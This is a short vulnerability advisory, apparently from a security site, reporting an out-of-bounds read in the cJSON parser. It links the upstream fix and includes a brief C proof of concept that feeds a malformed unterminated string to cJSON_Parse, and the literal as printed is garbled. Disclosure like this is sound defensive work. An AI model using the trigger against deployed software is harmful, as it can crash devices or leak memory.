cJSON buffer out of bound read

2016.10.02
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Hi, I would like to report a buffer out of bound read problem in cJSON, which is a embeddable JSON parser, used (I imagine) in embedded devices, or even bigger stuff like the ps4 ( http://doc.dl.playstation.net/doc/ps4-oss/cjson.html). patch: https://github.com/DaveGamble/cJSON/commit/94df772485c92866ca417d92137747b2e3b0a917 issue: https://github.com/DaveGamble/cJSON/issues/30 Poc with the malformed string #include <stdio.h> #include <stdint.h> #include <fcntl.h> #include "cJSON.h" static const char *my_json = ""000000000000000000\"; int main(int argc, const char * argv[]) { cJSON * root = cJSON_Parse(my_json); char * rendered = cJSON_Print(root); printf("%s\n", rendered); return 0; } thanks Marco

References:

https://github.com/DaveGamble/cJSON/commit/94df772485c92866ca417d92137747b2e3b0a917
https://github.com/DaveGamble/cJSON/issues/30


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top